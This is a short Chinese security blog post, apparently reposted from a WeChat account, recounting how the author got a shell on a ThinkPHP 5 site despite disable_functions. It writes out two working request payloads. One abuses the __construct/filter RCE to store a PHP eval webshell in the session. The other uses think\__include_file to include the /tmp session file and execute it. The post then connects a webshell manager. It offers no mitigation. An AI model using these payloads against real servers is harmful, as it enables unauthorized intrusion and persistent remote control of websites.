记一次ThinkPHP站点利用Session包含Getshell

admin 2023年12月13日13:40:24评论87 views字数 590阅读1分58秒阅读模式

前言:

        碰到一个thinkphp的站点,发现其存在RCE漏洞,但是因为disable_functions禁用了很多命令执行函数,导致没办法使用常规的paylaod,经过测试发现可以利用session包含的方式来进行Getshell。

1、在phpinfo中发现disable_functions禁用了很多命令执行函数

记一次ThinkPHP站点利用Session包含Getshell

2、首先通过设置session会话并传入一句话木马

_method=__construct&filter[]=thinkSession::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1

记一次ThinkPHP站点利用Session包含Getshell

3、然后直接利用文件包含去包含session文件,tp5的session文件一般都是在/tmp下面,文件名为sess_sessionid  

_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoi&c=phpinfo();

记一次ThinkPHP站点利用Session包含Getshell

4、sessionid 可以在cookie中找到

记一次ThinkPHP站点利用Session包含Getshell

5、使用蚁剑连接

蚁剑配置如下

记一次ThinkPHP站点利用Session包含Getshell

设置请求Body

记一次ThinkPHP站点利用Session包含Getshell

6、成功连接

记一次ThinkPHP站点利用Session包含Getshell


原文始发于微信公众号(安全攻防屋):记一次ThinkPHP站点利用Session包含Getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月13日13:40:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次ThinkPHP站点利用Session包含Getshellhttp://cn-sec.com/archives/2293636.html

发表评论

匿名网友 填写信息